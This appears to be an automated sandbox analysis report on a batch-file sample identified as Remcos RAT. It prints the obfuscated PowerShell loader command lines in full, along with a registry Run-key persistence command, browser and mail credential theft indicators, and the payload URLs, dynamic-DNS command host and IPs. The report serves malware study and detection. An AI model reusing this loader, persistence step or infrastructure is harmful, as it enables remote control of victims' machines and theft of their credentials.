Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pclglkctcdois" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#derindad telefonkdes kroforvalterens knudshoveds #>;$overimpressed215='steroider115';<#meso allittereredes sidelngder petroleumsovn markedsfringsomkostning #>;$omittancesforstrke116=$beseemingness+$host.ui;function foreslaa($tvivlstilfldet){if ($omittancesforstrke116) {$photoelectronics++;}$transformationsprocesser=$selskabsrevisors+$tvivlstilfldet.'length'-$photoelectronics; for( $omittance=4;$omittance -lt $transformationsprocesser;$omittance+=5){$benzanthrone++;$vandsskader+=$tvivlstilfldet[$omittance];$styreformerne15='uproblematiske';}$vandsskader;}function heraclitean($shagrag){ & ($liljekonvals) ($shagrag);}$noden=foreslaa 'cuprmtorpostigzsc tiuninls orlcarbaskul/lige ';$noden+=foreslaa 'intr5 od.slip0poli omf( ed wbairipreinrummd in orandwhumoskjru feman rect sta ste1 cab0jux .ixo 0 for;sind talawgorbivaesnhem 6.tvk4afst; v.d sattxst.b6kabo4p.lk; pet visur etev udh:khed1agit3brig1else. lai0edul)deli spirgslage roclandkdemoow ys/ .ri2di k0 .en1,ijo0rest0auto1enla0id.o1s am bosfafskimarkrp omef ihf teo,entxrobo/u es1sand3trav1 cou.indl0a em ';$deglutitive=foreslaa 'motiusne,shjese an.rbou - redaoto g k te chenn nstoxgo ';$spisekortet=foreslaa 'glach p.itsubstmod.pdogg:tiec/ i.t/connahererfesttu.viiansaefa nr dirici r.cl.nrdecaohypn/at ogsfol/tessspersk r,lieksifsko f gale.uchrnor d ernkty ek un ebor re itssprj.nunnpobstcengrx.jla ';$allineate=foreslaa 'fila>f.ru ';$liljekonvals=foreslaa '.amuibisaepo.kxcor ';$brneormens='sybaritternes';$omittanceronsided='\rgnes.und';heraclitean (foreslaa 'forb$ko,fgshorlunifoepigbc moasaprlomf :kautfpromou gyzpoutiforfnsu,pe addsluneskins=co.e$ lu,equesnsvnlvdell:unscanonvpringpdisudkakia omatequiathys+komp$ oodosn wmu piinoontawartmag abearnzibecforteunderkil o o,enyppessystiaftedfariediopdmukk ');heraclitean (foreslaa 'or a$svorg l,vlce.toko,mbsolba hyplout,:waremweara p aru,vojbenfu so,nfor sanop= cos$conush.ftpfan i isosrochelat k chaouncoromk,tchereliertne.p.es asoriep strls vsilocutafgi( min$akkuag nzl collphali bden higes nga armtiliaetric) sta ');heraclitean (foreslaa 'pane[esconmythedrysthelt.scots nhetovbrpladvrdbricentcafb evas p ynaoo.tbibedsnparat vapm orkaforbnmarmapennghoppeshirrhals].nal:leve:,uttshov elovmcdisbu ,arrerriieschtu brydelkp antrteosotunntkulko nolcudhoorendlpe.s prey=data u,or[ ulen uketoldt gez.af,askl,keconscformune trmanuigysetspiryprevpc.arrunr,ostamtce lophascstamod sil nomtaqqay f lpschie ufo]fend:e.cy:rstetw nwlomk sberr1for,2siti ');$spisekortet=$marjuns[0];$resident=(foreslaa 'para$carag,verl feboforebse mabattlrveh: ordogoosvw gee evereupsssu cp ad rprofig,leni nkghyrae,kerlskn.scandes bcrde h=fljenu.tre exewnon.-b skobarnbtrskjwoodeoptrcutydt pre uncswresy sanssterth,ttearmompost. ditnnitret.avto pa. sumw d mezealb ealcsuboluntwiperie prenintetth e ');heraclitean ($resident);heraclitean (foreslaa 'hand$klagopecuvdyste halrst,msmundps,ntr reniv ountria
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#derindad telefonkdes kroforvalterens knudshoveds #>;$overimpressed215='steroider115';<#meso allittereredes sidelngder petroleumsovn markedsfringsomkostning #>;$omittancesforstrke116=$beseemingness+$host.ui;function foreslaa($tvivlstilfldet){if ($omittancesforstrke116) {$photoelectronics++;}$transformationsprocesser=$selskabsrevisors+$tvivlstilfldet.'length'-$photoelectronics; for( $omittance=4;$omittance -lt $transformationsprocesser;$omittance+=5){$benzanthrone++;$vandsskader+=$tvivlstilfldet[$omittance];$styreformerne15='uproblematiske';}$vandsskader;}function heraclitean($shagrag){ & ($liljekonvals) ($shagrag);}$noden=foreslaa 'cuprmtorpostigzsc tiuninls orlcarbaskul/lige ';$noden+=foreslaa 'intr5 od.slip0poli omf( ed wbairipreinrummd in orandwhumoskjru feman rect sta ste1 cab0jux .ixo 0 for;sind talawgorbivaesnhem 6.tvk4afst; v.d sattxst.b6kabo4p.lk; pet visur etev udh:khed1agit3brig1else. lai0edul)deli spirgslage roclandkdemoow ys/ .ri2di k0 .en1,ijo0rest0auto1enla0id.o1s am bosfafskimarkrp omef ihf teo,entxrobo/u es1sand3trav1 cou.indl0a em ';$deglutitive=foreslaa 'motiusne,shjese an.rbou - redaoto g k te chenn nstoxgo ';$spisekortet=foreslaa 'glach p.itsubstmod.pdogg:tiec/ i.t/connahererfesttu.viiansaefa nr dirici r.cl.nrdecaohypn/at ogsfol/tessspersk r,lieksifsko f gale.uchrnor d ernkty ek un ebor re itssprj.nunnpobstcengrx.jla ';$allineate=foreslaa 'fila>f.ru ';$liljekonvals=foreslaa '.amuibisaepo.kxcor ';$brneormens='sybaritternes';$omittanceronsided='\rgnes.und';heraclitean (foreslaa 'forb$ko,fgshorlunifoepigbc moasaprlomf :kautfpromou gyzpoutiforfnsu,pe addsluneskins=co.e$ lu,equesnsvnlvdell:unscanonvpringpdisudkakia omatequiathys+komp$ oodosn wmu piinoontawartmag abearnzibecforteunderkil o o,enyppessystiaftedfariediopdmukk ');heraclitean (foreslaa 'or a$svorg l,vlce.toko,mbsolba hyplout,:waremweara p aru,vojbenfu so,nfor sanop= cos$conush.ftpfan i isosrochelat k chaouncoromk,tchereliertne.p.es asoriep strls vsilocutafgi( min$akkuag nzl collphali bden higes nga armtiliaetric) sta ');heraclitean (foreslaa 'pane[esconmythedrysthelt.scots nhetovbrpladvrdbricentcafb evas p ynaoo.tbibedsnparat vapm orkaforbnmarmapennghoppeshirrhals].nal:leve:,uttshov elovmcdisbu ,arrerriieschtu brydelkp antrteosotunntkulko nolcudhoorendlpe.s prey=data u,or[ ulen uketoldt gez.af,askl,keconscformune trmanuigysetspiryprevpc.arrunr,ostamtce lophascstamod sil nomtaqqay f lpschie ufo]fend:e.cy:rstetw nwlomk sberr1for,2siti ');$spisekortet=$marjuns[0];$resident=(foreslaa 'para$carag,verl feboforebse mabattlrveh: ordogoosvw gee evereupsssu cp ad rprofig,leni nkghyrae,kerlskn.scandes bcrde h=fljenu.tre exewnon.-b skobarnbtrskjwoodeoptrcutydt pre uncswresy sanssterth,ttearmompost. ditnnitret.avto pa. sumw d mezealb ealcsuboluntwiperie prenintetth e ');heraclitean ($resident);heraclitean (foreslaa 'hand$klagopecuvdyste halrst,ms
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#derindad telefonkdes kroforvalterens knudshoveds #>;$overimpressed215='steroider115';<#meso allittereredes sidelngder petroleumsovn markedsfringsomkostning #>;$omittancesforstrke116=$beseemingness+$host.ui;function foreslaa($tvivlstilfldet){if ($omittancesforstrke116) {$photoelectronics++;}$transformationsprocesser=$selskabsrevisors+$tvivlstilfldet.'length'-$photoelectronics; for( $omittance=4;$omittance -lt $transformationsprocesser;$omittance+=5){$benzanthrone++;$vandsskader+=$tvivlstilfldet[$omittance];$styreformerne15='uproblematiske';}$vandsskader;}function heraclitean($shagrag){ & ($liljekonvals) ($shagrag);}$noden=foreslaa 'cuprmtorpostigzsc tiuninls orlcarbaskul/lige ';$noden+=foreslaa 'intr5 od.slip0poli omf( ed wbairipreinrummd in orandwhumoskjru feman rect sta ste1 cab0jux .ixo 0 for;sind talawgorbivaesnhem 6.tvk4afst; v.d sattxst.b6kabo4p.lk; pet visur etev udh:khed1agit3brig1else. lai0edul)deli spirgslage roclandkdemoow ys/ .ri2di k0 .en1,ijo0rest0auto1enla0id.o1s am bosfafskimarkrp omef ihf teo,entxrobo/u es1sand3trav1 cou.indl0a em ';$deglutitive=foreslaa 'motiusne,shjese an.rbou - redaoto g k te chenn nstoxgo ';$spisekortet=foreslaa 'glach p.itsubstmod.pdogg:tiec/ i.t/connahererfesttu.viiansaefa nr dirici r.cl.nrdecaohypn/at ogsfol/tessspersk r,lieksifsko f gale.uchrnor d ernkty ek un ebor re itssprj.nunnpobstcengrx.jla ';$allineate=foreslaa 'fila>f.ru ';$liljekonvals=foreslaa '.amuibisaepo.kxcor ';$brneormens='sybaritternes';$omittanceronsided='\rgnes.und';heraclitean (foreslaa 'forb$ko,fgshorlunifoepigbc moasaprlomf :kautfpromou gyzpoutiforfnsu,pe addsluneskins=co.e$ lu,equesnsvnlvdell:unscanonvpringpdisudkakia omatequiathys+komp$ oodosn wmu piinoontawartmag abearnzibecforteunderkil o o,enyppessystiaftedfariediopdmukk ');heraclitean (foreslaa 'or a$svorg l,vlce.toko,mbsolba hyplout,:waremweara p aru,vojbenfu so,nfor sanop= cos$conush.ftpfan i isosrochelat k chaouncoromk,tchereliertne.p.es asoriep strls vsilocutafgi( min$akkuag nzl collphali bden higes nga armtiliaetric) sta ');heraclitean (foreslaa 'pane[esconmythedrysthelt.scots nhetovbrpladvrdbricentcafb evas p ynaoo.tbibedsnparat vapm orkaforbnmarmapennghoppeshirrhals].nal:leve:,uttshov elovmcdisbu ,arrerriieschtu brydelkp antrteosotunntkulko nolcudhoorendlpe.s prey=data u,or[ ulen uketoldt gez.af,askl,keconscformune trmanuigysetspiryprevpc.arrunr,ostamtce lophascstamod sil nomtaqqay f lpschie ufo]fend:e.cy:rstetw nwlomk sberr1for,2siti ');$spisekortet=$marjuns[0];$resident=(foreslaa 'para$carag,verl feboforebse mabattlrveh: ordogoosvw gee evereupsssu cp ad rprofig,leni nkghyrae,kerlskn.scandes bcrde h=fljenu.tre exewnon.-b skobarnbtrskjwoodeoptrcutydt pre uncswresy sanssterth,ttearmompost. ditnnitret.avto pa. sumw d mezealb ealcsuboluntwiperie prenintetth e ');heraclitean ($resident);heraclitean (foreslaa 'hand$klagopecuvdyste halrst,msmundps,ntr reniv ountria Jump to behavior
Source: msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerU9
Source: msiexec.exe, 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managera
Source: msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerO
Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager0
Source: msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager+
Source: msiexec.exe, 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerLW\
Source: msiexec.exe, 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerS
Source: msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager2
Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2429498672.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2430114623.000000000632E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: msiexec.exe, 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managervidera
Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F52933 cpuid 9_2_21F52933
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F52264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 9_2_21F52264
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 15_2_004082CD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0041739B GetVersionExW, 13_2_0041739B

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000009.00000002.3037991742.00000000002AE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 5172, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: ESMTPPassword 15_2_004033F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword 15_2_00402DB3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword 15_2_00402DB3
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 5172, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 412, type: MEMORYSTR

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-JTPTLW Jump to behavior
Yara detected Remcos RAT
Source: Yara match File source: 00000009.00000002.3037991742.00000000002AE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 5172, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1535955 Sample: SKU_0001710-1-2024-SX-3762.bat Startdate: 17/10/2024 Architecture: WINDOWS Score: 100 42 renajazinw.duckdns.org 2->42 44 geoplugin.net 2->44 46 artieri.ro 2->46 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 70 8 other signatures 2->70 9 powershell.exe 18 2->9         started        12 cmd.exe 1 2->12         started        signatures3 68 Uses dynamic DNS services 42->68 process4 signatures5 72 Early bird code injection technique detected 9->72 74 Writes to foreign memory regions 9->74 76 Found suspicious powershell code related to unpacking or dynamic code loading 9->76 78 Queues an APC in another process (thread injection) 9->78 14 msiexec.exe 5 16 9->14         started        19 conhost.exe 9->19         started        80 Suspicious powershell command line found 12->80 21 powershell.exe 14 22 12->21         started        23 conhost.exe 12->23         started        process6 dnsIp7 48 renajazinw.duckdns.org 193.187.91.216, 53848, 62802, 62817 OBE-EUROPEObenetworkEuropeSE Sweden 14->48 50 geoplugin.net 178.237.33.50, 62818, 80 ATOM86-ASATOM86NL Netherlands 14->50 40 C:\ProgramData\remcos\logs.dat, data 14->40 dropped 54 Detected Remcos RAT 14->54 56 Tries to steal Mail credentials (via file registry) 14->56 58 Maps a DLL or memory area into another process 14->58 25 msiexec.exe 2 14->25         started        28 msiexec.exe 1 14->28         started        30 cmd.exe 1 14->30         started        34 2 other processes 14->34 52 artieri.ro 89.44.138.129, 443, 49730, 49731 GTSCEGTSCentralEuropeAntelGermanyCZ Romania 21->52 60 Found suspicious powershell code related to unpacking or dynamic code loading 21->60 32 conhost.exe 21->32         started        file8 signatures9 process10 signatures11 82 Tries to harvest and steal browser information (history, passwords, etc) 25->82 36 conhost.exe 30->36         started        38 reg.exe 1 1 30->38         started        process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
89.44.138.129
 artieri.ro Romania
5588 GTSCEGTSCentralEuropeAntelGermanyCZ false
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL false
193.187.91.216
 renajazinw.duckdns.org Sweden
197595 OBE-EUROPEObenetworkEuropeSE true

Contacted Domains

Name IP Active
artieri.ro 89.44.138.129 true
geoplugin.net 178.237.33.50 true
renajazinw.duckdns.org 193.187.91.216 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://artieri.ro/g/Skifferdkkers.pcx false
    		unknown
    http://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin false
      		unknown
      renajazinw.duckdns.org true
        		unknown
        http://geoplugin.net/json.gp false
        • URL Reputation: safe
        		 unknown
        https://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin false
          		unknown
          https://artieri.ro/g/Skifferdkkers.pcx false
            		unknown